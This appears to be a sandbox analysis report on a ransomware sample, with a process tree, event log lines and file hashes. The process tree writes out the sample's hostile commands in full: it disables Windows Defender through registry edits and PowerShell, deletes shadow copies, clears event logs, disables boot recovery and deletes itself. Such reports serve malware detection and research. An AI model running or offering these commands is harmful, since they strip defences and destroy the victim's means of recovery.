afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe net.exe PID 964 wrote to memory of 1088 964 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe net.exe PID 964 wrote to memory of 1088 964 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe net.exe PID 1088 wrote to memory of 1080 1088 net.exe net1.exe PID 1088 wrote to memory of 1080 1088 net.exe net1.exe PID 1088 wrote to memory of 1080 1088 net.exe net1.exe PID 964 wrote to memory of 1064 964 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe net.exe PID 964 wrote to memory of 1064 964 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe net.exe PID 964 wrote to memory of 1064 964 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe net.exe PID 1064 wrote to memory of 1456 1064 net.exe net1.exe PID 1064 wrote to memory of 1456 1064 net.exe net1.exe PID 1064 wrote to memory of 1456 1064 net.exe net1.exe PID 964 wrote to memory of 1904 964 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe net.exe PID 964 wrote to memory of 1904 964 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe net.exe PID 964 wrote to memory of 1904 964 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe net.exe PID 1904 wrote to memory of 1808 1904 net.exe net1.exe PID 1904 wrote to memory of 1808 1904 net.exe net1.exe PID 1904 wrote to memory of 1808 1904 net.exe net1.exe PID 964 wrote to memory of 1372 964 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe sc.exe PID 964 wrote to memory of 1372 964 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe sc.exe PID 964 wrote to memory of 1372 964 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe sc.exe PID 964 wrote to memory of 1236 964 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe sc.exe PID 964 wrote to memory of 1236 964 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe sc.exe PID 964 wrote to memory of 1236 964 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe sc.exe PID 964 wrote to memory of 2024 964 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe sc.exe PID 964 wrote to memory of 2024 964 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe sc.exe PID 964 wrote to memory of 2024 964 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe sc.exe PID 964 wrote to memory of 1704 964 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe sc.exe PID 964 wrote to memory of 1704 964 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe sc.exe PID 964 wrote to memory of 1704 964 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe sc.exe PID 964 wrote to memory of 1008 964 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe sc.exe PID 964 wrote to memory of 1008 964 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe sc.exe PID 964 wrote to memory of 1008 964 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe sc.exe PID 964 wrote to memory of 2000 964 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe sc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe"C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe"1⤵
- Modifies extensions of user files
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:964 -
C:\Windows\system32\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1520 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:1912
-
C:\Windows\system32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:524 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:560
-
C:\Windows\system32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:668 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:1472
-
C:\Windows\system32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:784 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:1764
-
C:\Windows\system32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1744 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:1356
-
C:\Windows\system32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1088 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:1080
-
C:\Windows\system32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1064 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1456
-
C:\Windows\system32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1904 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:1808
-
C:\Windows\system32\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵PID:1372
-
C:\Windows\system32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:1236
-
C:\Windows\system32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:2024
-
C:\Windows\system32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:1704
-
C:\Windows\system32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1008
-
C:\Windows\system32\sc.exesc.exe config "VSS" start= disabled2⤵PID:2000
-
C:\Windows\system32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:1888
-
C:\Windows\system32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:916
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1244
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:1600
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1280
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:740
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:560
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1248
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:808
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1920
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:588
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:1108
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1456
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:1864
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:992
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:1828
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1772
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1960
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:276
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:308
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1668
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1768
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1132
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1464
-
C:\Windows\system32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1124
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:1084
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1728
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:824
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1608
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:700
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:684
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1576
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1592
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:1228 -
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:852
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1356 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1708 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1700 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:552 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1240 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1192 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:1680 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:1648 -
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:752
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:1328 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:1692
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1380 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:1832
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1940 -
C:\Windows\system32\notepad.exenotepad.exe C:\wPfq_HOW_TO_DECRYPT.txt2⤵
- Opens file in notepad (likely ransom note)
PID:2356 -
C:\Windows\system32\cmd.execmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe"2⤵PID:2364
-
C:\Windows\system32\PING.EXEping.exe -n 5 127.0.0.13⤵
- Runs ping.exe
PID:2388
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5636a642cc51545ec0988c32c35ec97d9
SHA1a2cc9c2669d423dc80ab3bad49f166f492580b6b
SHA256372ca373730a40c32719de2ac0119671b1e84b31ddb6919e796016562470c584
SHA51290373432cc1b50577b9ef6594bd5673f5fb0a705ef7bf5d1231c879ff043cff1a95c9c9838313173dcaf6958d0583a2723fd36b9c4cf250ec17bbf3b6493ebff
-
MD5
3d3aab4fac96343c7e4bf9f111f89193
SHA1550d2ea76bb0a789e4bfbefef4a899c4fbad254c
SHA25654643189ee659f0e200ac4eb1ae678f35c016e0905eca63e675dbeadfc2422d8
SHA51215b065276f0f8acd76c54462a6f71153e0df65a10aff76412bf2582940b46ff64124e2577e320220aa9c0daf1e4d3f5fc5d4d78aee5979e60a10690a702badda